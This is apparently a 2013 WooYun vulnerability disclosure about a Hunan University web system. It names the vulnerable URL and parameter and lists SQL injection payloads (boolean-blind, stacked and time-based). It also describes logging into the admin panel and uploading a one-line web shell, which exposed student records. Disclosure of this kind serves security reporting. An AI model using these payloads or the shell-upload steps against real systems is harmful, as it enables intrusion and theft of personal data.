当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2013-028297
漏洞标题:
湖南大学某站沦陷(已shell)导致学生信息泄露
相关厂商:
湖南大学
漏洞作者:
霍大然
提交时间:
2013-07-09 15:08
修复时间:
2013-08-23 15:09
公开时间:
2013-08-23 15:09
漏洞类型:
用户资料大量泄漏
危害等级:
自评Rank:
18
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2013-07-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-08-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

湖南大学(老牛了,211,985,34所)某站某站sql注入漏洞,导致大量学生信息(包括身份证信息学生密码)、研究生招生信息泄露,影响若干系统,可后台,可shell。

详细说明:

一切的罪恶源泉在下面:
http://ss.hnu.cn/mse/tutor.aspx?id=1%E2%80%98

11.png


12.png


Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=11 AND 7689=7689
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=11; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=11 WAITFOR DELAY '0:0:5'--

13.png


某系统的后台用户名与密码,全是明文:

14.png


于是进入后台:

15.png


后台很简单,经过研究过可以任意传文件,于是传了个一句话,连菜刀:

16.png


IP地址:

17.png


漏洞证明:

netstat如下:

18.png

修复方案:

你们也是研究安全的,知道怎么做。

版权声明:转载请注明来源 霍大然@乌云

>

漏洞回应

厂商回应:

危害等级:暂时无回应

漏洞Rank:0

确认时间:2013-07-09 15:08

厂商回复:

最新状态:

暂无